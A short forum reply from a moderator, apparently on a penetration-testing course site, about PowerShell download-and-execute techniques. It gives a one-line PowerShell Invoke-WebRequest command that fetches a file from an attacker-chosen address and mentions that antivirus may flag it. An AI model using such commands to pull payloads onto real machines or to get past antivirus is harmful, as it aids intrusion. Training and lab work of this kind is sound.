August 9, 2020 at 3:51 am
#43869
Diego Pérez
Moderator
Hi!
That’s the proper way to use powershell to download and execute a file, you can try to use another option, using Invoke-WebRequest, but it also might be flaged by the AV.
The command would be:
powershell iwr -uri http://<your address here> -outfile <name of the file>
Try using it.
Let me know how it goes!
Diego